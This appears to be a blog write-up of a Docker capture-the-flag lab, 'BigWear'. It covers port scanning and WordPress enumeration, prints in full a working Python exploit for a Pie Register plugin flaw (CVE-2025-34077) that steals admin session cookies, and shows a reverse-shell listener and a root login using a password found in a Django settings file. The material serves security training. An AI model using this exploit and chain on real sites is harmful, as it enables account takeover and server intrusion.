BIGWEAR MACHINE

 BIGWEAR

 

┌──(root㉿kali)-[/home/kali/Descargas]
└─# bash auto_deploy.sh bigwear.tar

                            ##        .         
                      ## ## ##       ==         
                   ## ## ## ##      ===         
               /""""""""""""""""\___/ ===       
          ~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ /  ===- ~~~
               \______ o          __/           
                 \    \        __/            
                  \____\______/               
                                          
  ___  ____ ____ _  _ ____ ____ _    ____ ___  ____ 
  |  \ |  | |    |_/  |___ |__/ |    |__| |__] [__  
  |__/ |__| |___ | \_ |___ |  \ |___ |  | |__] ___] 
                                         
                                     

Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2

Presiona Ctrl+C cuando termines con la máquina para eliminarla

┌──(root㉿kali)-[/home/kali]
└─# ping -c3 172.17.0.2             
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.038 ms
64 bytes from 172.17.0.2: icmp_seq=2 ttl=64 time=0.038 ms
64 bytes from 172.17.0.2: icmp_seq=3 ttl=64 time=0.062 ms

--- 172.17.0.2 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2031ms
rtt min/avg/max/mdev = 0.038/0.046/0.062/0.011 ms
   
Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed port 80 (HTTP), 8000 and 3000 were opened.            
┌──(root㉿kali)-[/home/kali]
└─# nmap -n -Pn -p- --min-rate 5000 -sV -sC -sS -vvv 172.17.0.2
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-11 09:35 CEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
Initiating ARP Ping Scan at 09:35
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 09:35, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:35
Scanning 172.17.0.2 [65535 ports]
Discovered open port 80/tcp on 172.17.0.2
Discovered open port 3000/tcp on 172.17.0.2
Discovered open port 8000/tcp on 172.17.0.2
Completed SYN Stealth Scan at 09:35, 0.74s elapsed (65535 total ports)
Initiating Service scan at 09:35
Scanning 3 services on 172.17.0.2
Completed Service scan at 09:35, 11.09s elapsed (3 services on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 1.56s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.16s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.01s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000050s latency).
Scanned at 2026-04-11 09:35:19 CEST for 14s
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.52 ((Ubuntu))
|_http-generator: WordPress 6.9.4
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-favicon: Unknown favicon MD5: 000BF649CC8F6BF27CFB04D1BCDCD3C7
|_http-title: BigWear WordPress
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
3000/tcp open  ppp?    syn-ack ttl 64
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 200 OK
|     Content-Length: 644
|     Content-Disposition: inline; filename="index.html"
|     Accept-Ranges: bytes
|     ETag: "f28d0bf7364f5ff87825e15951852d784de5b81e"
|     Content-Type: text/html; charset=utf-8
|     Vary: Accept-Encoding
|     Date: Sat, 11 Apr 2026 07:35:31 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="Web site created using create-react-app"/><link rel="apple-touch-icon" href="/logo192.png"/><link rel="manifest" href="/manifest.json"/><title>React App</title><script defer="defer" src="/static/js/main.49cf7e7a.js"></script><link href="/static/css/main.fdb74950.css" rel="stylesheet"></head><body><noscript>You need to enable JavaScript to run this app.</noscript><div id=
|   Help, NCP: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close
8000/tcp open  http    syn-ack ttl 64 WSGIServer 0.2 (Python 3.10.12)
|_http-title: Page not found at /
|_http-server-header: WSGIServer/0.2 CPython/3.10.12
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.95%I=7%D=4/11%Time=69D9F9C3%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,39F,"HTTP/1\.1\x20200\x20OK\r\nContent-Length:\x20644\r\nConte
SF:nt-Disposition:\x20inline;\x20filename=\"index\.html\"\r\nAccept-Ranges
SF::\x20bytes\r\nETag:\x20\"f28d0bf7364f5ff87825e15951852d784de5b81e\"\r\n
SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nVary:\x20Accept-Encodin
SF:g\r\nDate:\x20Sat,\x2011\x20Apr\x202026\x2007:35:31\x20GMT\r\nConnectio
SF:n:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><meta\x
SF:20charset=\"utf-8\"/><link\x20rel=\"icon\"\x20href=\"/favicon\.ico\"/><
SF:meta\x20name=\"viewport\"\x20content=\"width=device-width,initial-scale
SF:=1\"/><meta\x20name=\"theme-color\"\x20content=\"#000000\"/><meta\x20na
SF:me=\"description\"\x20content=\"Web\x20site\x20created\x20using\x20crea
SF:te-react-app\"/><link\x20rel=\"apple-touch-icon\"\x20href=\"/logo192\.p
SF:ng\"/><link\x20rel=\"manifest\"\x20href=\"/manifest\.json\"/><title>Rea
SF:ct\x20App</title><script\x20defer=\"defer\"\x20src=\"/static/js/main\.4
SF:9cf7e7a\.js\"></script><link\x20href=\"/static/css/main\.fdb74950\.css\
SF:"\x20rel=\"stylesheet\"></head><body><noscript>You\x20need\x20to\x20ena
SF:ble\x20JavaScript\x20to\x20run\x20this\x20app\.</noscript><div\x20id=")
SF:%r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\
SF:r\n\r\n")%r(NCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x
SF:20close\r\n\r\n")%r(HTTPOptions,39F,"HTTP/1\.1\x20200\x20OK\r\nContent-
SF:Length:\x20644\r\nContent-Disposition:\x20inline;\x20filename=\"index\.
SF:html\"\r\nAccept-Ranges:\x20bytes\r\nETag:\x20\"f28d0bf7364f5ff87825e15
SF:951852d784de5b81e\"\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\n
SF:Vary:\x20Accept-Encoding\r\nDate:\x20Sat,\x2011\x20Apr\x202026\x2007:35
SF::31\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x20la
SF:ng=\"en\"><head><meta\x20charset=\"utf-8\"/><link\x20rel=\"icon\"\x20hr
SF:ef=\"/favicon\.ico\"/><meta\x20name=\"viewport\"\x20content=\"width=dev
SF:ice-width,initial-scale=1\"/><meta\x20name=\"theme-color\"\x20content=\
SF:"#000000\"/><meta\x20name=\"description\"\x20content=\"Web\x20site\x20c
SF:reated\x20using\x20create-react-app\"/><link\x20rel=\"apple-touch-icon\
SF:"\x20href=\"/logo192\.png\"/><link\x20rel=\"manifest\"\x20href=\"/manif
SF:est\.json\"/><title>React\x20App</title><script\x20defer=\"defer\"\x20s
SF:rc=\"/static/js/main\.49cf7e7a\.js\"></script><link\x20href=\"/static/c
SF:ss/main\.fdb74950\.css\"\x20rel=\"stylesheet\"></head><body><noscript>Y
SF:ou\x20need\x20to\x20enable\x20JavaScript\x20to\x20run\x20this\x20app\.<
SF:/noscript><div\x20id=");
MAC Address: FA:59:56:2B:C9:F7 (Unknown)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.01s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.03 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

In addition, we can see with this command as we have obtained the vulnerable plugin which is pie-register as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# wpscan --url "http://172.17.0.2:80/" -e u,p
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://172.17.0.2/ [172.17.0.2]
[+] Started: Sat Apr 11 09:38:36 2026

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.52 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://172.17.0.2/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://172.17.0.2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://172.17.0.2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://172.17.0.2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.9.4 identified (Latest, released on 2026-03-11).
 | Found By: Rss Generator (Passive Detection)
 |  - http://172.17.0.2/feed/, <generator>https://wordpress.org/?v=6.9.4</generator>
 |  - http://172.17.0.2/comments/feed/, <generator>https://wordpress.org/?v=6.9.4</generator>

[+] WordPress theme in use: twentytwentyfive
 | Location: http://172.17.0.2/wp-content/themes/twentytwentyfive/
 | Latest Version: 1.4 (up to date)
 | Last Updated: 2025-12-03T00:00:00.000Z
 | Readme: http://172.17.0.2/wp-content/themes/twentytwentyfive/readme.txt
 | Style URL: http://172.17.0.2/wp-content/themes/twentytwentyfive/style.css
 | Style Name: Twenty Twenty-Five
 | Style URI: https://wordpress.org/themes/twentytwentyfive/
 | Description: Twenty Twenty-Five emphasizes simplicity and adaptability. It offers flexible design options, suppor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://172.17.0.2/wp-content/themes/twentytwentyfive/style.css, Match: 'Version: 1.4'

[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] *
 | Location: http://172.17.0.2/wp-content/plugins/*/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | The version could not be determined.

[+] pie-register
 | Location: http://172.17.0.2/wp-content/plugins/pie-register/
 | Last Updated: 2026-03-30T12:58:00.000Z
 | [!] The version is out of date, the latest version is 3.8.4.9
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 3.7.1.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://172.17.0.2/wp-content/plugins/pie-register/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://172.17.0.2/wp-json/wp/v2/users/?per_page=100&page=1
 |  Rss Generator (Aggressive Detection)
 |  Author Sitemap (Aggressive Detection)
 |   - http://172.17.0.2/wp-sitemap-users-1.xml
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Apr 11 09:38:42 2026
[+] Requests Done: 57
[+] Cached Requests: 8
[+] Data Sent: 15.93 KB
[+] Data Received: 729.461 KB
[+] Memory used: 255.277 MB
[+] Elapsed time: 00:00:06

Now, let's go to see what do this exploit as tou can see below.
┌──(root㉿kali)-[/home/kali]
└─# cat pie.py 
#!/usr/bin/env python3

import requests
import sys
from bs4 import BeautifulSoup

BANNER = r"""
   _______      ________            ___   ___ ___  _____            ____  _  _    ___ ______ ______ 
  / ____\ \    / /  ____|          |__ \ / _ \__ \| ____|          |___ \| || |  / _ \____  |____  |
 | |     \ \  / /| |__     ______     ) | | | | ) | |__    ______    __) | || |_| | | |  / /    / / 
 | |      \ \/ / |  __|   |______|   / /| | | |/ /|___ \  |______|  |__ <|__   _| | | | / /    / /  
 | |____   \  /  | |____            / /_| |_| / /_ ___) |           ___) |  | | | |_| |/ /    / /   
  \_____|   \/   |______|          |____|\___/____|____/           |____/   |_|  \___//_/    /_/    

                                by Mrj Haxcore | CVE-2025-34077
"""

HELP = """
Usage:
  python3 pie.py <http://target.site>

Description:
  This script exploits an unauthenticated admin session hijack vulnerability
  in the Pie Register WordPress plugin <= 3.7.1.4 to steal admin cookies.

Options:
  -h, --help    Show this help message and exit
"""

def main():
    print(BANNER)

    if len(sys.argv) < 2 or sys.argv[1] in ['-h', '--help']:
        print(HELP)
        sys.exit(0)

    target = sys.argv[1].rstrip('/')
    login_url = f"{target}/"

    headers = {
        "User-Agent": "Mozilla/5.0 (PoC Exploit for CVE-2025-34077)"
    }

    data = {
        "user_id_social_site": "1",  # Admin ID
        "social_site": "true",
        "piereg_login_after_registration": "true",
        "_wp_http_referer": "/login/",
        "log": "null",
        "pwd": "null"
    }

    print("[*] Sending payload to hijack admin session...")
    try:
        resp = requests.post(login_url, data=data, headers=headers, allow_redirects=False)
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        sys.exit(1)

    cookies = resp.cookies.get_dict()
    if cookies:
        print("\n[+] Successfully hijacked cookies for user_id=1 (admin):")
        for k, v in cookies.items():
            print(f"    {k} = {v}")

        print("\n[!] Use these cookies in your browser or tools like curl or Burp to act as admin.")
    else:
        print("[-] Failed to get any cookies. Target may be patched or not vulnerable.")
        print(f"[i] HTTP Status: {resp.status_code}")
        print(f"[i] Response Headers: {resp.headers}")

if __name__ == "__main__":
    main()

Let´s go to execute the exploit python3 pie.py http://172.17.0.2 as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# python3 pie.py http://172.17.0.2

   _______      ________            ___   ___ ___  _____            ____  _  _    ___ ______ ______ 
  / ____\ \    / /  ____|          |__ \ / _ \__ \| ____|          |___ \| || |  / _ \____  |____  |
 | |     \ \  / /| |__     ______     ) | | | | ) | |__    ______    __) | || |_| | | |  / /    / / 
 | |      \ \/ / |  __|   |______|   / /| | | |/ /|___ \  |______|  |__ <|__   _| | | | / /    / /  
 | |____   \  /  | |____            / /_| |_| / /_ ___) |           ___) |  | | | |_| |/ /    / /   
  \_____|   \/   |______|          |____|\___/____|____/           |____/   |_|  \___//_/    /_/    

                                by Mrj Haxcore | CVE-2025-34077

[*] Sending payload to hijack admin session...

[+] Successfully hijacked cookies for user_id=1 (admin):
    wordpress_a2a379b8590d3431d7153bb3b68da0df = admin%7C1776066114%7ClANm1m33v52nXeb4u03x22CjkjjTBNSd2QcAvON9FBi%7C28bc48a49d7e46b9f8c1211c5f177a92d45732795f41256737c96900f0ae6a96
    wordpress_logged_in_a2a379b8590d3431d7153bb3b68da0df = admin%7C1776066114%7ClANm1m33v52nXeb4u03x22CjkjjTBNSd2QcAvON9FBi%7C2fc944bf2d21fba96e0f1c05b15e87c56d81623f1188d78468b3885efbd818c3

[!] Use these cookies in your browser or tools like curl or Burp to act as admin.

When we create this header
wordpress_a2a379b8590d3431d7153bb3b68da0df = admin%7C1776066114%7ClANm1m33v52nXeb4u03x22CjkjjTBNSd2QcAvON9FBi%7C28bc48a49d7e46b9f8c1211c5f177a92d45732795f41256737c96900f0ae6a96

Modify this header
wordpress_logged_in_a2a379b8590d3431d7153bb3b68da0df = admin%7C1776066114%7ClANm1m33v52nXeb4u03x22CjkjjTBNSd2QcAvON9FBi%7C2fc944bf2d21fba96e0f1c05b15e87c56d81623f1188d78468b3885efbd818c3

We can will be root user without know the password.

We now have to create the reverse shell with this steps:
1. We are going to create reverse shell
2. We have to execute this command as you can see below nc -lvp 4444 and we will obtain the access.
 ──(root㉿kali)-[/home/kali]
└─# nc -lvp 4444
listening on [any] 4444 ...
172.17.0.2: inverse host lookup failed: Unknown host
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 36042
Linux 68538d56bfc8 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64 x86_64 x86_64 GNU/Linux
 08:05:59 up  1:13,  0 users,  load average: 0.40, 0.82, 0.87
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ $ whoami
www-data
$ ls -la
total 72
drwxr-xr-x   1 root root 4096 Apr 11 07:32 .
drwxr-xr-x   1 root root 4096 Apr 11 07:32 ..
-rwxr-xr-x   1 root root    0 Apr 11 07:32 .dockerenv
lrwxrwxrwx   1 root root    7 Feb 17 04:45 bin -> usr/bin
drwxr-xr-x   2 root root 4096 Apr 18  2022 boot
drwxr-xr-x   5 root root  340 Apr 11 07:32 dev
drwxr-xr-x   1 root root 4096 Apr 11 07:32 etc
drwxr-xr-x   2 root root 4096 Apr 18  2022 home
lrwxrwxrwx   1 root root    7 Feb 17 04:45 lib -> usr/lib
lrwxrwxrwx   1 root root    9 Feb 17 04:45 lib32 -> usr/lib32
lrwxrwxrwx   1 root root    9 Feb 17 04:45 lib64 -> usr/lib64
lrwxrwxrwx   1 root root   10 Feb 17 04:45 libx32 -> usr/libx32
drwxr-xr-x   2 root root 4096 Feb 17 04:45 media
drwxr-xr-x   2 root root 4096 Feb 17 04:45 mnt
drwxr-xr-x   1 root root 4096 Mar 23 14:29 opt
dr-xr-xr-x 309 root root    0 Apr 11 07:32 proc
drwx------   1 root root 4096 Mar 23 14:28 root
drwxr-xr-x   1 root root 4096 Apr 11 07:35 run
lrwxrwxrwx   1 root root    8 Feb 17 04:45 sbin -> usr/sbin
drwxr-xr-x   2 root root 4096 Feb 17 04:45 srv
dr-xr-xr-x  13 root root    0 Apr 11 07:32 sys
drwxrwxrwt   1 root root 4096 Apr 11 08:03 tmp
drwxr-xr-x   1 root root 4096 Feb 17 04:45 usr
drwxr-xr-x   1 root root 4096 Mar 23 13:46 var

$ sudo -l
sh: 3: sudo: not found
$ clear
TERM environment variable not set.
$ cd /usr       
$ clear
TERM environment variable not set.
$ ls
bin
games
include
lib
lib32
lib64
libexec
libx32
local
sbin
share
src
$ cd ..
$ cd /home      
$ ls
$ cd ..
$ ls
bin
boot
dev
etc
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cd /opt
$ ls
bigwear
diagnose.sh
init-wordpress.sh
start-services.sh
$ cd bigwear
$ ls
backend
frontend
media
$ cd frontend
$ ls
README.md
build
node_modules
package-lock.json
package.json
public
src
tsconfig.json
$ cat tsconfig.json
{
  "compilerOptions": {
    "target": "es5",
    "lib": [
      "dom",
      "dom.iterable",
      "esnext"
    ],
    "allowJs": true,
    "skipLibCheck": true,
    "esModuleInterop": true,
    "allowSyntheticDefaultImports": true,
    "strict": true,
    "forceConsistentCasingInFileNames": true,
    "noFallthroughCasesInSwitch": true,
    "module": "esnext",
    "moduleResolution": "node",
    "resolveJsonModule": true,
    "isolatedModules": true,
    "noEmit": true,
    "jsx": "react-jsx"
  },
  "include": [
    "src"
  ]
}


$ cd backend    
$ ls
__init__.py
__pycache__
asgi.py
db.sqlite3
manage.py
requirements.txt
settings.py
tienda
urls.py
wsgi.py
$ cat settings.py
"""
Django settings for backend project.

Generated by 'django-admin startproject' using Django 6.0.3.

For more information on this file, see
https://docs.djangoproject.com/en/6.0/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/6.0/ref/settings/
"""

from pathlib import Path

# Raíz del proyecto (bigwear/)
BASE_DIR = Path(__file__).resolve().parent.parent
# Carpeta backend/ (donde vive manage.py y db.sqlite3)
BACKEND_DIR = Path(__file__).resolve().parent


SECRET_KEY = 'django-insecure-761s4jy@_74==i7vfms0qkk22jg@(rp3npl$=lqf^vj=b8sst1'

DEBUG = True

ALLOWED_HOSTS = ['localhost', '127.0.0.1', '*', '0.0.0.0', '172.17.0.2']

Gotha! we have find out the credentials as you can see below.
# Credenciales del panel de administración
ADMIN_USERNAME = 'pepe'
ADMIN_PASSWORD = 'BigWear2024!@#'

# Configuración de base de datos cifrada

# Cifrado de base de datos SQLite (opcional)
DB_ENCRYPTION_KEY = 'BigWear2024!@#_encryption_key'
DB_ENCRYPTION_ENABLED = False  # Deshabilitado por defecto para evitar problemas


INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
    'rest_framework.authtoken',
    'corsheaders',
    'tienda',
]

MIDDLEWARE = [
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'wsgi.application'


# Database
# https://docs.djangoproject.com/en/6.0/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BACKEND_DIR / 'db.sqlite3',
        'OPTIONS': {
            'timeout': 20,
        }
    }
}


# Password validation
# https://docs.djangoproject.com/en/6.0/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization
# https://docs.djangoproject.com/en/6.0/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/6.0/howto/static-files/

STATIC_URL = 'static/'

# Configuración de CORS
CORS_ALLOWED_ORIGINS = [
    "http://localhost:3000",
    "http://127.0.0.1:3000",
    "http://localhost:80",
    "http://172.17.0.2:3000",
    "http://172.17.0.2:80",
]

# Permitir cualquier origen para desarrollo
CORS_ALLOW_ALL_ORIGINS = True

CORS_ALLOW_CREDENTIALS = True

# Configuración de Django REST Framework
REST_FRAMEWORK = {
    'DEFAULT_PERMISSIONS_CLASSES': [
        'rest_framework.permissions.AllowAny',
    ]
}

Gotha! we have discovered root password as you can see below.
# Configuración de archivos multimedia
MEDIA_URL = '/media/'
MEDIA_ROOT = BASE_DIR / 'media'
$ su root               
Password: BigWear2024!@#
whoami
root

Thank you very much for reading this article

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Comments

Post a Comment

Entradas Populares

INTERNAL

Image
 INTERNAL(TRYHACKME) First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below. Key open ports and services include: Web Servers: Port 80 (HTTP):  Running  Apache2 Ubuntu Default Page . It supports  OPTIONS ,  TRACE  (flagged as potentially risky),  GET ,  HEAD , and  POST  methods. The webpage title is " INTERNAL ". SSH Protocol Port 22 (SSH): Running Linux . ┌──(root㉿kali)-[/home/luis/Descargas] └─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST NSE: Loaded 126 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed Initiating SYN Stealth Scan at 12:06 Scanning 10.10.216.78 [65535 ports] Discove...
Read more »

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

activedirectory

Image
ACTIVEDIRECTORY (TRYHACKME) First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command: sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV This revealed several open TCP ports with associated services, including: DNS (53),  HTTP  (80),  Kerberos (88),  RPC (135),  NetBIOS-SSN (139),  SMB (445),  RDP (3389),  WS-Management (5985)  LDAP (389, 636, 3268, 3269) Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos , Active Directory LDAP , and Microsoft Terminal Services . The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can se...
Read more »

Metasploit Framework

Image
 METASPLOIT FRAMEWORK USE TO  AUXILIARY MODULE FROM METASPLOIT First of all, I have used the auxiliary modules from Metasploit-Framework which could allow me Scanning, see ports, SO version, vulnerability in applications etc, where you can see at the bottom of the picture if  I use this module whose name is: auxiliary/scanner/discovery/arp_sweep  (To verify the IPs listening in the network) Now, we can observe that when I have selected in the auxiliary module I have had to do this set up  that we can observe in the second page below: INTERFACE : This I've set up the network interface that in my case is the eth0 interface. RHOSTS :This I've set up the IP Address which I am finding out that in my case is 192.168.100.0/24 (all the IP Address from network that could be possible which I am analyzing). THREADS : Are the threads; it's the fast  that I want to analyze the IP Addresses but in my case there are 15 threads because I want to analize as fast as possible...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

HOSTING

Image
